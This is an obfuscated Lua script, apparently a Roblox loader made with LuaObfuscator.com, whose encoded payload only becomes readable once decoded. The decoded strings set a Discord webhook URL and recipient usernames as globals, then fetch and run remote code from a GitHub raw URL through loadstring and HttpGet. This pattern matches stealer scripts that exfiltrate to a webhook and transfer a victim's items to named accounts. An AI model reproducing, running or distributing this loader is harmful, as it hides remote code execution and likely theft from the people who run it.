--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v68=v2(v0(v30,16));if v19 then local v78=v5(v68,v19);v19=nil;return v78;else return v68;end end end);local function v20(v31,v32,v33)if v33 then local v69=(v31/(2^(v32-1)))%((5 -3)^(((v33-(2 -1)) -(v32-1)) + (1 -(0 + 0)))) ;return v69-(v69%(2 -1)) ;else local v70=(621 -(555 + 64))^(v32-(932 -(135 + 722 + 74))) ;return (((v31%(v70 + v70))>=v70) and (569 -(367 + 201))) or ((1804 -(282 + 595)) -(214 + 713)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (1639 -(1523 + 114)) ;return (v36 * (231 + 25)) + v35 ;end local function v23()local v37=0 -0 ;local v38;local v39;local v40;local v41;while true do if (v37==((2023 -(892 + 65)) -(68 + 997))) then return (v41 * (16778486 -((538 -312) + 1044))) + (v40 * (285370 -219834)) + (v39 * (373 -(32 + 85))) + v38 ;end if (v37==(0 + 0)) then v38,v39,v40,v41=v1(v16,v18,v18 + 1 + 2 );v18=v18 + 4 ;v37=1;end end end local function v24()local v42=v23();local v43=v23();local v44=1 -0 ;local v45=(v20(v43,1 -0 ,(65 + 305) -(87 + (466 -203)) ) * ((182 -(67 + 113))^(24 + 8))) + v42 ;local v46=v20(v43,21 + 0 ,75 -44 );local v47=((v20(v43,24 + 8 )==1) and  -(3 -2)) or (953 -(802 + 150)) ;if (v46==((791 -(368 + 423)) -0)) then if (v45==(0 -0)) then return v47 * (0 + 0) ;else v46=998 -(915 + 82) ;v44=0;end elseif (v46==(5796 -(11781 -8032))) then return ((v45==(0 + 0)) and (v47 * (1/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(2210 -(1069 + 118)) ) * (v44 + (v45/((4 -2)^(113 -(79 -(10 + 8)))))) ;end local function v25(v48)local v49;if  not v48 then local v71=0;while true do if (v71==0) then v48=v23();if (v48==(0 -(0 + 0))) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(443 -(416 + 26)) );v18=v18 + v48 ;local v50={};for v66=3 -2 , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 -0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51~=2) then else local v72=0 + 0 ;while true do if (v72~=(1 -0)) then else v51=1387 -(746 + 638) ;break;end if (v72~=(0 + 0)) then else v56=nil;v57=nil;v72=1 -0 ;end end end if (v51~=(342 -(218 + 123))) then else local v73=0;while true do if (v73~=1) then else v51=4 -2 ;break;end if (v73==(1581 -(1535 + 46))) then v54=nil;v55=nil;v73=1 + 0 ;end end end if (v51~=(3 + 0)) then else v58=nil;while true do local v79=0;local v80;while true do if ((0 + 0)~=v79) then else v80=0 -0 ;while true do if (v80==(754 -(239 + 514))) then if (v52==(1 + 0)) then local v108=0;local v109;while true do if (v108==0) then v109=1329 -(797 + 532) ;while true do if (0~=v109) then else local v165=560 -(306 + 254) ;local v166;while true do if (v165~=(0 + 0)) then else v166=0;while true do if (v166==(0 -0)) then v56={v53,v54,nil,v55};v57=v23();v166=732 -(476 + 255) ;end if (v166==(2 -1)) then v109=1;break;end end break;end end end if (v109~=1) then else v58={};v52=2 + 0 ;break;end end break;end end end if ((0 -0)==v52) then local v110=0;local v111;while true do if (v110~=(0 -0)) then else v111=238 -(64 + 174) ;while true do if ((604 -(268 + 335))~=v111) then else v55={};v52=291 -(60 + 230) ;break;end if (v111~=(336 -(144 + 192))) then else local v167=572 -(426 + 146) ;while true do if (v167~=(0 + 0)) then else v53={};v54={};v167=1;end if (v167==(1 + 0)) then v111=1457 -(282 + 1174) ;break;end end end end break;end end end break;end if (v80~=(811 -(569 + 242))) then else local v103=0 -0 ;local v104;while true do if (v103==(0 + 0)) then v104=0 + 0 ;while true do if (1~=v104) then else v80=1025 -(706 + 318) ;break;end if (v104~=0) then else local v152=1504 -(363 + 1141) ;while true do if (v152==(1581 -(1183 + 397))) then v104=2 -1 ;break;end if (v152==0) then if (v52==(1253 -(721 + 530))) then local v168=1271 -(945 + 326) ;local v169;local v170;while true do if (v168~=(0 -0)) then else v169=1975 -(1913 + 62) ;v170=nil;v168=1;end if (v168~=(1 + 0)) then else while true do if (v169~=(700 -(271 + 429))) then else v170=0;while true do if (v170==0) then for v176=1 + 0 ,v57 do local v177=0 -0 ;local v178;local v179;local v180;local v181;while true do if (v177==(1502 -(1408 + 92))) then while true do if ((1086 -(461 + 625))~=v178) then else local v187=0;while true do if (v187~=(1933 -(565 + 1368))) then else v179=0;v180=nil;v187=1289 -(993 + 295) ;end if (v187~=(1662 -(1477 + 184))) then else v178=1;break;end end end if (v178==1) then v181=nil;while true do if (v179==(0 + 0)) then local v195=0;while true do if ((1 -0)==v195) then v179=1172 -(418 + 753) ;break;end if (v195==(0 + 0)) then v180=v21();v181=nil;v195=1 + 0 ;end end end if (v179==(1 + 0)) then if (v180==(1 -0)) then v181=v21()~=(0 + 0) ;elseif (v180==(531 -(406 + 123))) then v181=v24();elseif (v180~=3) then else v181=v25();end v58[v176]=v181;break;end end break;end end break;end if (v177~=(305 -(244 + 60))) then else v180=nil;v181=nil;v177=1771 -(1749 + 20) ;end if (v177==0) then v178=0 + 0 ;v179=nil;v177=1;end end end v56[3]=v21();v170=1323 -(1249 + 73) ;end if ((1 + 0)~=v170) then else for v182=1,v23() do local v183=0;local v184;local v185;while true do if (v183==(1146 -(466 + 679))) then while true do if ((0 + 0)~=v184) then else v185=v21();if (v20(v185,1,2 -1 )==(0 -0)) then local v190=0;local v191;local v192;local v193;local v194;while true do if (v190==(0 + 0)) then v191=1613 -(1565 + 48) ;v192=nil;v190=1 + 0 ;end if (v190==(1901 -(106 + 1794))) then v193=nil;v194=nil;v190=1 + 1 ;end if (2~=v190) then else while true do if (v191~=(1 + 0)) then else local v197=0;while true do if (v197~=(0 -0)) then else v194={v22(),v22(),nil,nil};if (v192==(0 + 0)) then local v204=0 -0 ;local v205;local v206;while true do if (v204~=(584 -(57 + 527))) then else v205=1427 -(41 + 1386) ;v206=nil;v204=1019 -(697 + 321) ;end if (v204==(104 -(17 + 86))) then while true do if (v205~=(0 + 0)) then else v206=0 -0 ;while true do if (0==v206) then v194[8 -5 ]=v22();v194[170 -(122 + 44) ]=v22();break;end end break;end end break;end end elseif (v192==(1 -0)) then v194[5 -2 ]=v23();elseif (v192==(6 -4)) then v194[3 + 0 ]=v23() -((1 + 1)^16) ;elseif (v192==(1 + 2)) then local v214=0;local v215;local v216;while true do if (v214==(1 -0)) then while true do if (v215~=(65 -(30 + 35))) then else v216=0 + 0 ;while true do if ((1227 -(322 + 905))~=v216) then else v194[1260 -(1043 + 214) ]=v23() -((7 -5)^(1228 -(323 + 889))) ;v194[10 -6 ]=v22();break;end end break;end end break;end if (v214~=(580 -(361 + 219))) then else v215=320 -(53 + 267) ;v216=nil;v214=1 + 0 ;end end end v197=414 -(15 + 398) ;end if (v197~=(983 -(18 + 964))) then else v191=7 -5 ;break;end end end if (v191==(2 + 1)) then if (v20(v193,2 + 1 ,853 -(20 + 830) )==(1 + 0)) then v194[951 -(245 + 702) ]=v58[v194[130 -(116 + 10) ]];end v53[v182]=v194;break;end if (v191==(0 + 0)) then local v199=0 + 0 ;local v200;while true do if (v199~=(1898 -(260 + 1638))) then else v200=440 -(382 + 58) ;while true do if (0~=v200) then else local v211=0;while true do if (1==v211) then v200=3 -2 ;break;end if ((0 + 0)~=v211) then else v192=v20(v185,3 -1 ,3);v193=v20(v185,742 -(542 + 196) ,6);v211=2 -1 ;end end end if (1==v200) then v191=1 -0 ;break;end end break;end end end if (v191~=(3 -1)) then else local v201=0;while true do if (v201==0) then if (v20(v193,1 + 0 ,1 + 0 )~=(1 + 0)) then else v194[4 -2 ]=v58[v194[2]];end if (v20(v193,2,4 -2 )==(215 -(22 + 192))) then v194[3]=v58[v194[1554 -(1126 + 425) ]];end v201=1;end if (v201~=(406 -(118 + 287))) then else v191=11 -8 ;break;end end end end break;end end end break;end end break;end if (v183~=(1121 -(118 + 1003))) then else v184=0 -0 ;v185=nil;v183=1;end end end v52=768 -(468 + 297) ;break;end end break;end end break;end end end if (v52==(565 -(334 + 228))) then local v171=0;local v172;while true do if (v171~=(0 -0)) then else v172=0 -0 ;while true do if (v172~=(377 -(142 + 235))) then else local v173=0 -0 ;local v174;while true do if (v173~=(236 -(141 + 95))) then else v174=0 + 0 ;while true do if (v174==0) then local v186=0 -0 ;while true do if (v186==(0 + 0)) then for v188=978 -(553 + 424) ,v23() do v54[v188-(1 -0) ]=v28();end return v56;end end end end break;end end end end break;end end end v152=1 + 0 ;end end end end break;end end end end break;end end end break;end if (v51==(0 -0)) then local v74=0 + 0 ;while true do if (v74==(0 + 0)) then local v98=0;while true do if (v98~=(1 + 0)) then else v74=1 + 0 ;break;end if (v98==0) then v52=0;v53=nil;v98=1 -0 ;end end end if (v74~=(1 + 0)) then else v51=164 -(92 + 71) ;break;end end end end end local function v29(v59,v60,v61)local v62=0;local v63;local v64;local v65;while true do if (v62==0) then v63=v59[1];v64=v59[2];v62=1;end if (v62==1) then v65=v59[3];return function(...)local v81=v63;local v82=v64;local v83=v65;local v84=v27;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v95=0,v89 do if (v95>=v83) then v87[v95-v83 ]=v88[v95 + 1 ];else v91[v95]=v88[v95 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do v93=v81[v85];v94=v93[1];if (v94<=5) then if (v94<=2) then if (v94<=0) then v85=v93[3];elseif (v94==1) then local v112=v93[2];local v113=v91[v93[3]];v91[v112 + 1 ]=v113;v91[v112]=v113[v93[4]];else local v117=v93[2];local v118,v119=v84(v91[v117](v13(v91,v117 + 1 ,v93[3])));v86=(v119 + v117) -1 ;local v120=0;for v145=v117,v86 do v120=v120 + 1 ;v91[v145]=v118[v120];end end elseif (v94<=3) then do return;end elseif (v94>4) then local v121;local v122,v123;local v124;local v125;v91[v93[2]][v93[3]]=v93[4];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v61[v93[3]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v61[v93[3]];v85=v85 + 1 ;v93=v81[v85];v125=v93[2];v124=v91[v93[3]];v91[v125 + 1 ]=v124;v91[v125]=v124[v93[4]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3]~=0 ;v85=v85 + 1 ;v93=v81[v85];v125=v93[2];v122,v123=v84(v91[v125](v13(v91,v125 + 1 ,v93[3])));v86=(v123 + v125) -1 ;v121=0;for v148=v125,v86 do v121=v121 + 1 ;v91[v148]=v122[v121];end v85=v85 + 1 ;v93=v81[v85];v125=v93[2];v91[v125]=v91[v125](v13(v91,v125 + 1 ,v86));v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]();v85=v85 + 1 ;v93=v81[v85];v85=v93[3];else local v137=v93[2];v91[v137]=v91[v137](v13(v91,v137 + 1 ,v86));end elseif (v94<=8) then if (v94<=6) then v91[v93[2]]=v93[3];elseif (v94==7) then if (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end else v91[v93[2]]=v61[v93[3]];end elseif (v94<=10) then if (v94>9) then local v141=0;while true do if (v141==1) then v85=v85 + 1 ;v93=v81[v85];v91[v93[2]][v93[3]]=v93[4];v85=v85 + 1 ;v141=2;end if (v141==2) then v93=v81[v85];v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v141=3;end if (v141==3) then v85=v93[3];break;end if (v141==0) then v91[v93[2]][v93[3]]=v93[4];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v61[v93[3]];v141=1;end end else v91[v93[2]]();end elseif (v94==11) then v91[v93[2]][v93[3]]=v93[4];else v91[v93[2]]=v93[3]~=0 ;end v85=v85 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313234353932333138392O323632353132352F5243484642702D6B7772566667556D2O5F36656273427261427158523059716543676866646B7A77795274556356694F3455767A647335344B486231444376417931614F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D6503073O0061666B6D756E6103093O00557365724E616D653200173O0012063O00013O0026073O000E0001000200044O000E0001001208000100033O00300500010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000500016O000200056O00013O00024O00010001000100044O001600010026073O00010001000100044O00010001001208000100033O00300A0001000A000B00122O000100033O00302O0001000C000B00124O00023O00044O000100012O00033O00017O00",v9(),...);end
